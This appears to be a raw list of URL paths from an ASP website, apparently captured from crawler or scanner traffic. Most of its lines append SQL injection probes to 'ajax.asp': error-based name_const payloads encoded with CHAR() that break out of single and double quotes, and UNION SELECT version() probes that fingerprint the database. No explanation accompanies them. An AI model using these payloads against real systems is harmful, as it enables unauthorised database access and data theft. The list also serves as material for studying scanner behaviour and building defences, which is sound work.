ajax/
ajax.asp
ajax.asp or (1,2)=(select*from(select name_const(CHAR(112,75,115,105,90,85,107,109,113,104),1),name_const(CHAR(112,75,115,105,90,85,107,109,113,104),1))a) -- and 1=1
ajax.asp or (1,2)=(select*from(select name_const(CHAR(67,102,68,69,72,103,73,90,83),1),name_const(CHAR(67,102,68,69,72,103,73,90,83),1))a) -- and 1=1
ajax.asp"
ajax.asp" or (1,2)=(select*from(select name_const(CHAR(112,75,115,105,90,85,107,109,113,104),1),name_const(CHAR(112,75,115,105,90,85,107,109,113,104),1))a) -- "x"="x
ajax.asp" or (1,2)=(select*from(select name_const(CHAR(67,102,68,69,72,103,73,90,83),1),name_const(CHAR(67,102,68,69,72,103,73,90,83),1))a) -- "x"="x
ajax.asp'
ajax.asp' or (1,2)=(select*from(select name_const(CHAR(112,75,115,105,90,85,107,109,113,104),1),name_const(CHAR(112,75,115,105,90,85,107,109,113,104),1))a) -- 'x'='x
ajax.asp' or (1,2)=(select*from(select name_const(CHAR(67,102,68,69,72,103,73,90,83),1),name_const(CHAR(67,102,68,69,72,103,73,90,83),1))a) -- 'x'='x
ajax.asp2121121121212.1
ajax.asp99999" union select unhex(hex(version())) -- "x"="x
ajax.asp99999' union select unhex(hex(version())) -- 'x'='x
ajax.asp999999.1 union select unhex(hex(version())) -- and 1=1
display/
display.asp
images/
index/
index.asp/
post/
post.asp
query/
query.asp/
reg.asp